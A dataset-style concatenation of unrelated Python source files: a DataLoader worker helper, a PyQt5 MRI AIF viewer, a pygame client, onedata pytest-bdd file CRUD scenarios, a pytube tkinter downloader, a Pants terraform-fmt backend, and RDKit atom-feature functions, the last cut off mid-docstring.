def get_num_workers(
    num_workers: Optional[int] = None,
    default_max: int = 16,
) -> int:
    """Resolve the number of DataLoader workers to use.

    On macOS the auto value is 0 (works around a known DataLoader bug);
    elsewhere it is the physical core count capped at ``default_max``. An
    explicitly passed ``num_workers`` is always respected, with a warning
    when it exceeds the auto value.

    Args:
        num_workers: explicit worker count, or None to auto-detect.
        default_max: upper bound for the auto-detected count.

    Returns:
        The worker count to use.
    """
    if sys.platform == 'darwin':
        auto_workers = 0
        if num_workers is None:
            log.warning(f'MacOS detected, setting num_workers to {auto_workers} to avoid Dataloader bug.')
            num_workers = auto_workers
        elif num_workers > auto_workers:
            log.warning(f'MacOS detected, but manually set num_workers is greater than zero at {num_workers}, might result in a Dataloader bug!')
    else:
        # Bug fix: psutil.cpu_count(logical=False) may return None when the
        # physical core count cannot be determined, which made min(None, n)
        # raise TypeError. Fall back to a single worker in that case.
        physical_cores = psutil.cpu_count(logical=False) or 1
        auto_workers = min(physical_cores, default_max)
        if num_workers is None:
            num_workers = auto_workers
            log.warning(f'Automatically set num_workers to {num_workers}, cpu_count is {physical_cores}, max auto workers is {default_max}')
        elif num_workers > auto_workers:
            log.warning(f'manually set num_workers at {num_workers} might be too high, cpu_count is {physical_cores}, max auto workers is {default_max}')
    return num_workers
# ========================================================================= #
# END #
# ========================================================================= #
| 1.59375 | 2 |
src/QbiPy/tools/AIF_viewer/AIF_viewer_tool.py | michaelberks/madym_python | 0 | 12766374 | <gh_stars>0
'''
GUI tool for inspecting auto-detected AIFs as generated by Madym
'''
import sys
import os
import glob
from PyQt5.QtWidgets import QApplication, QPushButton, QAction, QMainWindow, QWidget, QMessageBox, QGraphicsScene, QFileDialog
from PyQt5.QtCore import QObject, Qt, pyqtSlot
from PyQt5.QtGui import QImage, qRgb
import numpy as np
from scipy import ndimage
from QbiPy.image_io.analyze_format import read_analyze_img
from QbiPy.tools import qbiqscene as qs
from QbiPy.tools.AIF_viewer.AIF_viewer import Ui_AIFViewer
from QbiPy.dce_models.dce_aif import Aif, AifType
image_format = "*.hdr"
AIF_format = "*_AIF.txt"
class AIFViewerTool(QMainWindow):
    """Qt main window for browsing auto-detected AIFs from Madym.

    Loads every ``*_AIF.txt`` (plus optional ``*_AIF.hdr`` voxel mask) from an
    AIF directory, plots the selected AIF curve, and overlays its mask voxels
    on a slice of a dynamic Analyze-format volume. Callbacks rely on Qt's
    auto-connect-by-name mechanism (on_<widget>_<signal>).
    """
    # --------------------------------------------------------------------
    # --------------------------------------------------------------------
    def __init__(self, AIF_dir=None, dynamic_image=None, parent=None):
        """Build the UI; prompt for the AIF dir / dynamic image if not given.

        NOTE(review): self.dynamic_dir is only ever assigned inside
        select_AIF_dir / select_dynamic_image, so it may be unset when both
        paths are passed in — confirm before relying on it.
        """
        #Create the UI
        QWidget.__init__(self, parent)
        self.ui = Ui_AIFViewer()
        self.ui.setupUi(self)
        self.ui.scene1 = qs.QbiQscene()
        self.ui.leftGraphicsView.setScene(self.ui.scene1)
        self.ui.colorbar = qs.QbiQscene()
        self.ui.colorbarGraphicsView.setScene(self.ui.colorbar)
        #Initialize instance variables
        self.AIF_names = []
        self.num_AIFs = 0
        self.curr_AIF = 0
        self.AIFs = []
        self.AIF_masks = []
        self.num_slices = 0
        self.curr_slice = 0
        if AIF_dir == None:
            self.AIF_dir = ''
            self.select_AIF_dir()
        else:
            self.AIF_dir = AIF_dir
            self.ui.aifDirLineEdit.setText(AIF_dir)
        if dynamic_image is None:
            self.dynamic_image_path = ''
            self.select_dynamic_image()
        else:
            self.dynamic_image_path = dynamic_image
            self.ui.dynVolLineEdit.setText(dynamic_image)
    # Connect any signals that aren't auto name matched
    def connect_signals_to_slots(self):
        """Placeholder: every used signal is auto-connected by name."""
        pass
        #QtCore.QObject.connect(self.ui.button_open,QtCore.SIGNAL("clicked()"), self.file_dialog)
    # --------------------------------------------------------------------
    #--------------------------------------------------------------------------
    #--------------------------------------------------------------------------
    # Auxilliary functions that control data
    #
    #--------------------------------------------------------------------------
    def get_AIF_list(self, init_AIF=0):
        """Scan the AIF dir for *_AIF.txt files, load them and show the first."""
        #Get list of image names and update the relevant controls
        #Load in the initial subject
        if not os.path.isdir(self.AIF_dir):
            QMessageBox.warning(self, 'AIF directory not found!',
                self.AIF_dir + ' is not a directory, check disk is connected')
            return
        self.AIF_names = [os.path.basename(f) for f in glob.glob(
            os.path.join(self.AIF_dir, AIF_format))]
        self.num_AIFs = len(self.AIF_names)
        if self.num_AIFs:
            if init_AIF and init_AIF <= self.num_AIFs:
                self.curr_AIF = init_AIF
            else:
                self.curr_AIF = 0
            #Update uicontrols now we have data
            self.ui.aifComboBox.setEnabled(True)
            self.ui.aifComboBox.clear()
            AIF_text = 'AIFs in folder:'
            for aif in self.AIF_names:
                self.ui.aifComboBox.addItem(aif)
                AIF_text += '\n'
                AIF_text += aif
            self.ui.aifInfoTextEdit.setText(AIF_text)
            #Load in the images
            self.load_AIFs()
            #Load in the images for the first pair and update the pair
            #selecter
            self.update_curr_AIF()
        else:
            QMessageBox.warning(self, 'No subjects found!', 'No subjects found in ' + self.AIF_dir)
    #--------------------------------------------------------------------------
    def load_dynamic_image(self):
        """Read the dynamic Analyze volume and initialise the slice slider."""
        if not os.path.isfile(self.dynamic_image_path):
            QMessageBox.warning(self, 'Dynamic image not found!',
                self.dynamic_image_path + ' does not exist, check disk is connected')
            return
        self.dynamic_image = read_analyze_img(self.dynamic_image_path)
        #Get size of this image
        self.num_slices = self.dynamic_image.shape[2]
        #By default stay on the same previous slice as before
        if self.curr_slice >= self.num_slices:
            self.curr_slice = self.num_slices-1
        #Set slices slider
        if self.num_slices > 1:
            self.ui.sliceSlider.setRange(1, self.num_slices)
            self.ui.sliceSlider.setSingleStep(1)
            self.ui.sliceSlider.setValue(self.curr_slice+1)
            self.ui.sliceSlider.setEnabled(True)
        #Display image
        self.update_volume_display()
        #Make colorbar
        self.make_colorbar()
    #--------------------------------------------------------------------------
    def load_AIFs(self):
        """Load every AIF curve and its matching voxel mask (None if missing)."""
        #h = waitbar(0,'Loading MR volumes. Please wait...')
        self.AIFs = []
        self.AIF_masks = []
        for AIF_name in self.AIF_names:
            aif_path = os.path.join(self.AIF_dir, AIF_name)
            aif = Aif(aif_type=AifType.FILE, filename=aif_path)
            self.AIFs.append(aif)
            aif_mask_name = os.path.splitext(aif_path)[0] + ".hdr"
            if os.path.isfile(aif_mask_name):
                aif_mask = read_analyze_img(aif_mask_name)
                self.AIF_masks.append(aif_mask==1)
            else:
                self.AIF_masks.append(None)
                print('Missing mask ', aif_mask_name)
        if self.curr_AIF >= self.num_AIFs:
            self.curr_AIF = self.num_AIFs-1
    #----------------------------------------------------------------------
    def update_curr_AIF(self):
        """Sync the selection widgets/buttons with curr_AIF, then redraw."""
        AIF_text = 'Select AIF: ' + str(self.curr_AIF+1) + ' of ' + str(self.num_AIFs)
        self.ui.selectAifLabel.setText(AIF_text)
        self.ui.aifComboBox.setCurrentIndex(self.curr_AIF)
        self.ui.nextAifButton.setEnabled(self.curr_AIF < self.num_AIFs-1)
        self.ui.previousAifButton.setEnabled(self.curr_AIF)
        #Display image
        self.update_AIF_display()
    #--------------------------------------------------------------------------
    def update_AIF_display(self):
        """Plot the current AIF curve (C(t) vs time) in the matplotlib widget."""
        aif = self.AIFs[self.curr_AIF]
        self.ui.aifPlotWidget.canvas.ax.clear()
        self.ui.aifPlotWidget.canvas.ax.plot(
            aif.times_, aif.base_aif_)
        self.ui.aifPlotWidget.canvas.ax.set_xlabel(
            'Time (mins)')
        self.ui.aifPlotWidget.canvas.ax.set_ylabel(
            'C(t)')
        self.ui.aifPlotWidget.canvas.ax.set_title(
            self.AIF_names[self.curr_AIF])
        self.ui.aifPlotWidget.canvas.draw()
    #--------------------------------------------------------------------------
    def update_volume_display(self):
        """Render the current slice (contrast-scaled to 0-255) plus AIF voxels."""
        self.ui.scene1.reset()
        #Get current slice of each volume
        slice = self.dynamic_image[:,:,self.curr_slice]
        # finite min/max of the slice define the raw display window
        self.slice_min = np.min(slice[np.isfinite(slice)])
        self.slice_max = np.max(slice[np.isfinite(slice)])
        if self.slice_min == self.slice_max:
            self.slice_range = 1
        else:
            self.slice_range = self.slice_max - self.slice_min
        scaled_slice = (255*(slice-self.slice_min) / self.slice_range).astype(np.uint8)
        #Compute the apsect ratios for these images (they may vary from
        #pair to pair)
        height,width = slice.shape
        #Compute map limits for color scaling
        min_contrast = 0
        max_contrast = 255
        self.ui.minContrastSlider.setRange(min_contrast, max_contrast-1)
        self.ui.minContrastSlider.setSingleStep(1)
        self.ui.minContrastSlider.setValue(min_contrast)
        self.ui.minContrastSlider.setEnabled(True)
        self.ui.maxContrastSlider.setRange(min_contrast+1, max_contrast)
        self.ui.maxContrastSlider.setSingleStep(1)
        self.ui.maxContrastSlider.setValue(max_contrast)
        self.ui.maxContrastSlider.setEnabled(True)
        self.set_contrast_label(min_contrast, max_contrast)
        #Make the maps visible
        self.ui.scene1.update_raw_color_table(min_contrast, max_contrast)
        q_img1 = QImage(scaled_slice.data, width, height, QImage.Format_Indexed8)
        self.ui.scene1.set_image(q_img1)
        self.ui.leftGraphicsView.fitInView(self.ui.scene1.itemsBoundingRect(),
                                           Qt.KeepAspectRatio)
        self.ui.scene1.update()
        #Add annotation if any
        aif_mask = self.AIF_masks[self.curr_AIF]
        if not aif_mask is None:
            aif_mask_slice = aif_mask[:,:,self.curr_slice]
            aif_xyz = np.nonzero(aif_mask_slice)
            if len(aif_xyz[0]):
                # annotation coordinates are relative to the image centre
                self.ui.scene1.add_annotation_points(aif_xyz[1] - width/2, aif_xyz[0] - height/2)
            else:
                self.ui.scene1.clear_annotation_points()
        self.ui.dynVolLabel.setText('%s: slice %d'
            %(
            os.path.basename(self.dynamic_image_path),
            self.curr_slice+1))
        self.ui.selectSliceLabel.setText('Select slice: %d of %d'
            %(self.curr_slice+1, self.num_slices))
    #--------------------------------------------------------------------------
    def select_dynamic_image(self):
        """Open a file dialog to choose the dynamic Analyze (.hdr) image.

        NOTE(review): in PyQt5, QFileDialog.getOpenFileName returns a
        (fileName, selectedFilter) tuple, so os.path.dirname(temp_path)
        below would fail — looks like PyQt4-style usage; verify.
        """
        self.ui.dynVolLineEdit.setEnabled(False)
        temp_path = QFileDialog.getOpenFileName(self, 'Open file',
            self.dynamic_dir, "Image files (*.hdr)")
        if temp_path:
            self.dynamic_dir = os.path.dirname(temp_path)
            self.dynamic_image_path = temp_path
            self.ui.dynVolLineEdit.setText(temp_path)
        self.ui.dynVolLineEdit.setEnabled(True)
    #--------------------------------------------------------------------------
    def select_AIF_dir(self):
        """Open a directory dialog to choose the AIF folder."""
        self.ui.aifDirLineEdit.setEnabled(False)
        temp_dir = QFileDialog.getExistingDirectory(self, 'Select the AIF directory',
            self.AIF_dir,
            QFileDialog.ShowDirsOnly)
        if temp_dir:
            self.AIF_dir = temp_dir
            self.ui.aifDirLineEdit.setText(temp_dir)
            if not self.dynamic_dir:
                self.dynamic_dir = self.AIF_dir
        self.ui.aifDirLineEdit.setEnabled(True)
    #--------------------------------------------------------------------------
    def set_contrast_label(self, min_contrast, max_contrast):
        """Map 0-255 slider positions back to raw intensities for the labels."""
        min_val = self.slice_range*min_contrast/255 + self.slice_min
        max_val = self.slice_range*max_contrast/255 + self.slice_min
        self.ui.minContrast.setText('%g' %(min_val))
        self.ui.maxContrast.setText('%g' %(max_val))
        self.ui.minContrast1.setText('%g' %(min_val))
        self.ui.maxContrast1.setText('%g' %(max_val))
    def make_colorbar(self):
        """Render a 0-255 gradient strip in the colorbar view."""
        self.ui.colorbarGraphicsView.setHorizontalScrollBarPolicy(
            Qt.ScrollBarAlwaysOff)
        self.ui.colorbarGraphicsView.setVerticalScrollBarPolicy(
            Qt.ScrollBarAlwaysOff)
        self.ui.colorbar.reset()
        self.ui.colorbar.update_raw_color_table(0, 255)
        colorbar = np.repeat(np.expand_dims(np.arange(255),0), 1, 0).astype(np.uint8)
        height,width = colorbar.shape
        q_img = QImage(colorbar.data, width, height, QImage.Format_Indexed8)
        self.ui.colorbar.set_image(q_img)
        self.ui.colorbarGraphicsView.fitInView(self.ui.colorbar.sceneRect(),
                                               Qt.IgnoreAspectRatio)
        self.ui.colorbar.update()
    #--------------------------------------------------------------------------
    #--------------------------------------------------------------------------
    # UI Callbacks
    # We make use of QT's autoconnect naming feature here so we don't need to
    # explicitly connect the various widgets with their callbacks
    #--------------------------------------------------------------------------
    # -------------------------------------------------------------------------
    @pyqtSlot()
    def on_aifDirSelectButton_clicked(self):
        """Choose a new AIF directory and reload its AIF list."""
        self.select_AIF_dir()
        self.get_AIF_list(0)
    # -------------------------------------------------------------------------
    @pyqtSlot()
    def on_dynVolDirSelectButton_clicked(self):
        """Choose and load a new dynamic image."""
        self.select_dynamic_image()
        self.load_dynamic_image()
    # --------------------------------------------------------------------
    @pyqtSlot()
    def on_nextAifButton_clicked(self):
        """Advance to the next AIF (no-op at the end of the list)."""
        next_aif = self.curr_AIF + 1
        if 0 <= next_aif < self.num_AIFs:
            self.curr_AIF = next_aif
            self.update_curr_AIF()
    # --------------------------------------------------------------------
    @pyqtSlot()
    def on_previousAifButton_clicked(self):
        """Step back to the previous AIF (no-op at the start of the list)."""
        next_aif = self.curr_AIF - 1
        if 0 <= next_aif < self.num_AIFs:
            self.curr_AIF = next_aif
            self.update_curr_AIF()
    # --------------------------------------------------------------------
    def on_aifComboBox_activated(self):
        """Jump to the AIF picked in the combo box."""
        self.curr_AIF = self.ui.aifComboBox.currentIndex()
        self.update_curr_AIF()
    # --------------------------------------------------------------------
    def on_minContrastSlider_sliderMoved(self, value:int):
        """Raise the lower contrast bound, pushing the upper bound if needed."""
        min_slider = int(value)
        max_slider = max(min_slider + 1, self.ui.maxContrastSlider.value())
        self.ui.maxContrastSlider.setValue(max_slider)
        self.ui.scene1.update_raw_color_table(min_slider, max_slider)
        self.set_contrast_label(min_slider, max_slider)
    # --------------------------------------------------------------------
    def on_maxContrastSlider_sliderMoved(self, value:int):
        """Lower the upper contrast bound, pushing the lower bound if needed."""
        max_slider = int(value)
        min_slider = min(max_slider-1, self.ui.minContrastSlider.value())
        self.ui.minContrastSlider.setValue(min_slider)
        self.ui.scene1.update_raw_color_table(min_slider, max_slider)
        self.set_contrast_label(min_slider, max_slider)
    # --------------------------------------------------------------------
    def on_sliceSlider_sliderMoved(self, value:int):
        """Show the slice selected on the slider (slider is 1-based)."""
        next_slice = int(value)-1
        if 0 <= next_slice < self.num_slices:
            self.curr_slice = next_slice
            self.update_volume_display()
    # --------------------------------------------------------------------
    @pyqtSlot()
    def wheelEvent(self,event):
        """Scroll wheel steps one slice up/down through the volume."""
        delta = event.angleDelta().y()
        step = (delta and delta // abs(delta))  # sign of delta, 0 if no scroll
        next_slice = self.curr_slice + step
        if 0 <= next_slice < self.num_slices:
            self.curr_slice = next_slice
            self.ui.sliceSlider.setValue(self.curr_slice+1)
            self.update_volume_display()
    #---------------------------------------------------------------------
    # (Commented-out MATLAB-era keypress/scroll callbacks removed here;
    #  they duplicated the wheelEvent/slider behaviour. See VCS history.)
    #--------------------------------------------------------------------------
    #--------------------------------------------------------------------------
    #---------------------- END OF CLASS -----------------------------------
    #--------------------------------------------------------------------------
    #--------------------------------------------------------------------------
if __name__ == "__main__":
    # Optional CLI arguments: AIF directory, then a dynamic image path.
    app = QApplication(sys.argv)
    args = sys.argv[1:]
    aif_dir = args[0] if len(args) >= 1 else None
    dynamic_image = args[1] if len(args) >= 2 else None
    init_image = 0
    viewer = AIFViewerTool(aif_dir, dynamic_image)
    viewer.show()
    viewer.get_AIF_list(init_image)
    viewer.load_dynamic_image()
    sys.exit(app.exec_())
client.py | starcreep48/HearthStoneBGLite | 2 | 12766375 | import os
import sys
from time import sleep
from colors import WOOD, BLACK, WHITE
import pygame
from renderer import Renderer
from renderer.Renderer import eventManager
from events import EventEnums
Renderer.initializeRenderer()
from gui.button import Button
import json
import glob
# Load the first recorded replay found on disk.
replays = glob.glob('replays/*')
with open(replays[0]) as replay_file:  # close the handle instead of leaking it
    replay = json.load(replay_file)

VERSION = 'v0.0.1'
FONT = pygame.font.SysFont('calibri', 15)
fontColor = BLACK


def background(dt):
    """Clear the screen to the table colour each frame."""
    Renderer.screen.fill(WOOD)


def drawGame(dt):
    """Draw the version string in the bottom-left corner of the screen."""
    Renderer.screen.blit(FONT.render(VERSION, True, fontColor), (3, Renderer.getScreenResolution()[1] - 15))


def quitGame(event, dt):
    """Event handler: stop the main loop when a quit event arrives."""
    global running
    running = False


clock = pygame.time.Clock()
eventManager.subscribe(EventEnums.quitGame, quitGame)

running = True
Renderer.addCallableToBackgroundLoop(background)

# Main loop: tick at 60 FPS and let the renderer pump events and callables.
while running:
    dt = clock.tick(60)
    Renderer.processEventsAndCallables(dt)

pygame.quit()
sys.exit()
tests/acceptance/scenarios/test_multi_reg_file_CRUD.py | aoxiangflysky/onedata | 2 | 12766376 | <gh_stars>1-10
"""Test suite for CRUD operations on regular files in onedata,
in multi-client environment.
"""
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2015 ACK CYFRONET AGH"
__license__ = "This software is released under the MIT license cited in " \
"LICENSE.txt"
from tests.acceptance.steps.env_steps import *
from tests.acceptance.steps.multi_auth_steps import *
from tests.acceptance.steps.multi_dir_steps import *
from tests.acceptance.steps.multi_file_steps import *
from tests.acceptance.steps.multi_reg_file_steps import *
from functools import partial
from pytest_bdd import scenario
import pytest
# Bind every scenario below to the multi_reg_file_CRUD feature file. Each
# test_* function only registers the scenario with pytest-bdd (the step
# implementations come from the imported steps modules), hence the empty bodies.
scenario = partial(scenario, '../features/multi_reg_file_CRUD.feature')


@scenario('Create regular file')
def test_create(env_description_file):
    pass


@scenario('Create a file, read it on the second client, delete it, and repeat '
          'the whole process')
def test_recreate_and_read(env_description_file):
    pass


@scenario('Rename regular file without write permission on parent')
def test_rename_without_write_permission_on_parent(env_description_file):
    pass


@scenario('Rename regular file with write permission on parent')
def test_rename_with_permission(env_description_file):
    pass


@scenario('Delete regular file by owner')
def test_delete_by_owner(env_description_file):
    pass


@scenario('Delete regular file by other user with write permission on parent')
def test_delete_by_other_user(env_description_file):
    pass


@scenario('Fail to delete regular file by other user without write permission on parent')
def test_fail_to_delete_by_other_user_without_write_permission(env_description_file):
    pass


@scenario('Read and write to regular file')
def test_read_write(env_description_file):
    pass


@scenario('Read right after write by other client')
def test_read_right_after_write(env_description_file):
    pass


@scenario('Read regular file without read permission')
def test_read_without_permission(env_description_file):
    pass


@scenario('Write to regular file with write permission')
def test_write_with_permission(env_description_file):
    pass


@scenario('Write to regular file without write permission')
def test_write_without_permission(env_description_file):
    pass


@scenario('Execute file with execute permission')
def test_execute_with_permission(env_description_file):
    pass


@scenario('Execute file without execute permission')
def test_execute_without_permission(env_description_file):
    pass


@scenario('Move regular file and read')
def test_move(env_description_file):
    pass


@scenario('Move big regular file and check MD5')
def test_move_big(env_description_file):
    pass


@scenario('Copy regular file and read')
def test_copy(env_description_file):
    pass


@scenario('Copy big regular file and check MD5')
def test_copy_big(env_description_file):
    pass


@scenario('Deleting file opened by other user for reading')
def test_delete_file_opened_for_reading(env_description_file):
    pass


@scenario('Deleting file opened by other user for reading and writing')
def test_delete_file_opened_for_rdwr(env_description_file):
    pass


@scenario('Deleting file without permission should fail, file is opened by other user')
def test_delete_opened_file_without_permission(env_description_file):
    pass


@scenario('Deleting file right after closing it')
def test_delete_right_after_close(env_description_file):
    pass


@scenario("Create many children")
def test_create_many(env_description_file):
    pass


@scenario('Create nonempty file then copy it and remove source file')
def test_copy_delete(env_description_file):
    pass


@scenario('Create nonempty file then move it to another space')
def test_move_between_spaces(env_description_file):
    pass
main.py | Budu0101/PythonYoutubeVideoDownloader | 1 | 12766377 | from pytube import *
# Importing tkinter module
from tkinter import *
# Create the root window and set its title and dimensions.
root = Tk()
root.title("Python Youtube Video Downloader")
root.geometry('350x200')

# Prompt label and URL entry field.
# NOTE: the original code called `YouTube(video_url)` here, before `video_url`
# existed, which raised a NameError at import time; that line is removed — the
# URL is only read inside `clicked()` once the user presses the button.
lbl = Label(root, text = "Please enter a valid Youtube URL: ")
lbl.grid()

video_url = Entry(root, width=10)
video_url.grid(column =1, row =0)


def clicked():
    """Download the first available stream of the entered URL into the cwd."""
    # `from pytube import *` binds `YouTube` directly; the module name
    # `pytube` itself is NOT bound, so `pytube.YouTube(...)` was a NameError.
    yt = YouTube(video_url.get())
    # The first stream of the list (format includes mime_type, resolution,
    # fps, vcodec, acodec); change the selection here if another is wanted.
    video = yt.streams.first()
    # Downloads the .mp4 file into the current directory.
    video.download()


# Button that triggers the download.
btn = Button(root, text = "Start Converting" ,
             fg = "black", command=clicked)
btn.grid(column=2, row=0)

root.mainloop()
| 3.828125 | 4 |
src/python/pants/backend/terraform/lint/tffmt/tffmt.py | yoav-orca/pants | 1,806 | 12766378 | <filename>src/python/pants/backend/terraform/lint/tffmt/tffmt.py
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import textwrap
from pants.backend.terraform.lint.fmt import TerraformFmtRequest
from pants.backend.terraform.style import StyleSetup, StyleSetupRequest
from pants.backend.terraform.tool import TerraformProcess
from pants.backend.terraform.tool import rules as tool_rules
from pants.core.goals.fmt import FmtResult
from pants.core.goals.lint import LintRequest, LintResult, LintResults
from pants.core.util_rules import external_tool
from pants.engine.fs import Digest, MergeDigests
from pants.engine.internals.selectors import Get, MultiGet
from pants.engine.process import FallibleProcessResult, ProcessResult
from pants.engine.rules import collect_rules, rule
from pants.engine.unions import UnionRule
from pants.option.subsystem import Subsystem
from pants.util.logging import LogLevel
logger = logging.getLogger(__name__)
class TfFmtSubsystem(Subsystem):
    """Pants subsystem holding the `terraform fmt` options (currently only `--skip`)."""
    options_scope = "terraform-fmt"
    help = """Terraform fmt options."""

    @classmethod
    def register_options(cls, register):
        # Register `--skip` so users can opt out of tffmt in `fmt`/`lint` goals.
        super().register_options(register)
        register(
            "--skip",
            type=bool,
            default=False,
            help=(
                f"Don't use `terraform fmt` when running `{register.bootstrap.pants_bin_name} fmt` and "
                f"`{register.bootstrap.pants_bin_name} lint`."
            ),
        )
class TffmtRequest(TerraformFmtRequest):
    # Marker request type that routes Terraform field sets to the tffmt rules below.
    pass
@rule(desc="Format with `terraform fmt`")
async def tffmt_fmt(request: TffmtRequest, tffmt: TfFmtSubsystem) -> FmtResult:
    """Run `terraform fmt` over each directory of the request and merge the results."""
    if tffmt.options.skip:
        return FmtResult.skip(formatter_name="tffmt")
    setup = await Get(StyleSetup, StyleSetupRequest(request, ("fmt",)))
    results = await MultiGet(
        Get(ProcessResult, TerraformProcess, process)
        for _, (process, _) in setup.directory_to_process.items()
    )

    # Renamed from `format` — the original name shadowed the builtin.
    def render_output(directory, output):
        # Skip the header for directories that produced no output.
        if not output.strip():
            return ""
        return textwrap.dedent(
            f"""\
            Output from `terraform fmt` on files in {directory}:
            {output.decode("utf-8")}
            """
        )

    stdout_content = ""
    stderr_content = ""
    for directory, result in zip(setup.directory_to_process.keys(), results):
        stdout_content += render_output(directory, result.stdout)
        stderr_content += render_output(directory, result.stderr)

    # Merge all of the per-directory outputs into a single output digest.
    output_digest = await Get(Digest, MergeDigests(r.output_digest for r in results))

    return FmtResult(
        input=setup.original_digest,
        output=output_digest,
        stdout=stdout_content,
        stderr=stderr_content,
        formatter_name="tffmt",
    )
@rule(desc="Lint with `terraform fmt`", level=LogLevel.DEBUG)
async def tffmt_lint(request: TffmtRequest, tffmt: TfFmtSubsystem) -> LintResults:
    """Run `terraform fmt -check` per directory and report one LintResult each."""
    if tffmt.options.skip:
        return LintResults([], linter_name="tffmt")
    setup = await Get(StyleSetup, StyleSetupRequest(request, ("fmt", "-check")))
    # `-check` makes terraform exit non-zero on unformatted files, hence Fallible.
    results = await MultiGet(
        Get(FallibleProcessResult, TerraformProcess, process)
        for _, (process, _) in setup.directory_to_process.items()
    )
    lint_results = [LintResult.from_fallible_process_result(result) for result in results]
    return LintResults(lint_results, linter_name="tffmt")
def rules():
    """Expose this backend's rules and union registrations to the Pants engine."""
    return [
        *collect_rules(),
        *external_tool.rules(),
        *tool_rules(),
        UnionRule(LintRequest, TffmtRequest),
        UnionRule(TerraformFmtRequest, TffmtRequest),
    ]
| 1.992188 | 2 |
chemmltoolkit/features/atomFeatures.py | Andy-Wilkinson/ChemMLToolk | 1 | 12766379 | <reponame>Andy-Wilkinson/ChemMLToolk
from os import path
from rdkit.Chem import Mol
from chemmltoolkit.features.decorators import tokenizable_feature
from rdkit.Chem import Atom
from rdkit.Chem import AllChem
from rdkit.Chem import ChiralType
from rdkit.Chem import HybridizationType
from rdkit.Chem import rdCIPLabeler
class _ChemicalFeatureGenerator():
    """Lazily-initialised singleton wrapping RDKit's chemical feature factory.

    Used to flag hydrogen-bond acceptor/donor atoms on a molecule via
    string properties ('0'/'1') read by `is_hbond_acceptor`/`is_hbond_donor`.
    """
    _instance = None

    def __new__(cls):
        # Classic singleton: build the feature factory only once, on first use.
        if cls._instance is None:
            cls._instance = super(
                _ChemicalFeatureGenerator, cls).__new__(cls)

            # Imported lazily so module import stays cheap.
            from rdkit import RDConfig
            from rdkit.Chem import ChemicalFeatures
            fdef_path = path.join(RDConfig.RDDataDir, 'BaseFeatures.fdef')
            cls._instance.feature_factory = \
                ChemicalFeatures.BuildFeatureFactory(fdef_path)

        return cls._instance

    def assign_features(self, mol: Mol):
        """Set '_Feature_Acceptor'/'_Feature_Donor' ('0'/'1') on every atom of `mol`."""
        # Reset both flags on all atoms before marking the detected features.
        for atom in mol.GetAtoms():
            atom.SetProp('_Feature_Acceptor', '0')
            atom.SetProp('_Feature_Donor', '0')

        features = self.feature_factory.GetFeaturesForMol(mol)
        for feature in features:
            family = feature.GetFamily()
            for atom_idx in feature.GetAtomIds():
                atom = mol.GetAtomWithIdx(atom_idx)
                if family == 'Acceptor':
                    atom.SetProp('_Feature_Acceptor', '1')
                elif family == 'Donor':
                    atom.SetProp('_Feature_Donor', '1')
def atomic_number(atom: Atom) -> int:
    """Atomic number (int).
    """
    return atom.GetAtomicNum()


def atomic_mass(atom: Atom) -> float:
    """Atomic mass (float).
    """
    return atom.GetMass()


def charge(atom: Atom) -> int:
    """Formal charge (int).
    """
    return atom.GetFormalCharge()


def charge_gasteiger(atom: Atom) -> float:
    """Gasteiger partial charge (float).

    Computed lazily for the whole owning molecule on first access and
    cached on the atoms as the '_GasteigerCharge' property.
    """
    if not atom.HasProp('_GasteigerCharge'):
        mol = atom.GetOwningMol()
        AllChem.ComputeGasteigerCharges(mol)
    return atom.GetDoubleProp('_GasteigerCharge')


def charge_gasteiger_h(atom: Atom) -> float:
    """Gasteiger partial charge for implicit hydrogens (float).

    Computed lazily for the whole owning molecule on first access and
    cached on the atoms as the '_GasteigerHCharge' property.
    """
    if not atom.HasProp('_GasteigerHCharge'):
        mol = atom.GetOwningMol()
        AllChem.ComputeGasteigerCharges(mol)
    return atom.GetDoubleProp('_GasteigerHCharge')
@tokenizable_feature([ChiralType.CHI_UNSPECIFIED,
                      ChiralType.CHI_TETRAHEDRAL_CW,
                      ChiralType.CHI_TETRAHEDRAL_CCW,
                      ChiralType.CHI_OTHER])
def chiral_tag(atom: Atom) -> ChiralType:
    """Chirality of the atom (ChiralType).
    """
    return atom.GetChiralTag()


def degree(atom: Atom) -> int:
    """Number of directly bonded neighbours (int).
    """
    return atom.GetDegree()


@tokenizable_feature([HybridizationType.SP,
                      HybridizationType.SP2,
                      HybridizationType.SP3,
                      HybridizationType.SP3D,
                      HybridizationType.SP3D2])
def hybridization(atom: Atom) -> HybridizationType:
    """Hybridisation (HybridizationType).
    """
    return atom.GetHybridization()


def hydrogens(atom: Atom) -> int:
    """Total number of hydrogen atoms (int), explicit plus implicit.
    """
    return atom.GetTotalNumHs()


def index(atom: Atom) -> int:
    """Index within the parent molecule (int).
    """
    return atom.GetIdx()
def is_aromatic(atom: Atom) -> int:
    """If the atom is aromatic (0 or 1).
    """
    return int(atom.GetIsAromatic())


def is_hbond_acceptor(atom: Atom) -> int:
    """If the atom is a hydrogen bond acceptor (0 or 1).

    Feature flags are computed once per molecule by
    _ChemicalFeatureGenerator and cached as atom properties.
    """
    if not atom.HasProp('_Feature_Acceptor'):
        mol = atom.GetOwningMol()
        _ChemicalFeatureGenerator().assign_features(mol)
    return atom.GetIntProp('_Feature_Acceptor')


def is_hbond_donor(atom: Atom) -> int:
    """If the atom is a hydrogen bond donor (0 or 1).

    Feature flags are computed once per molecule by
    _ChemicalFeatureGenerator and cached as atom properties.
    """
    if not atom.HasProp('_Feature_Donor'):
        mol = atom.GetOwningMol()
        _ChemicalFeatureGenerator().assign_features(mol)
    return atom.GetIntProp('_Feature_Donor')
def is_ring(atom: Atom) -> int:
    """If the atom is is in a ring (0 or 1).
    """
    return int(atom.IsInRing())


def is_ringsize(ringSize: int):
    """Feature factory: returns a feature testing ring membership of a given size.

    The returned callable maps an Atom to 0/1 depending on whether it is
    in a ring of exactly `ringSize` atoms.

    Args:
        ringSize: The size of the ring.
    """
    def _is_ringsize(atom: Atom) -> int:
        return int(atom.IsInRingSize(ringSize))
    # Give each generated feature a distinguishable name, e.g. 'is_ringsize(6)'.
    _is_ringsize.__name__ = f'is_ringsize({ringSize})'
    return _is_ringsize


def isotope(atom: Atom) -> int:
    """Isotope (int).
    """
    return atom.GetIsotope()


def radical(atom: Atom) -> int:
    """Number of radical electrons (int).
    """
    return atom.GetNumRadicalElectrons()
@tokenizable_feature(['', 'R', 'S'])
def stereochemistry(atom: Atom) -> str:
    """CIP sterochemistry label (string): '', 'R' or 'S'.

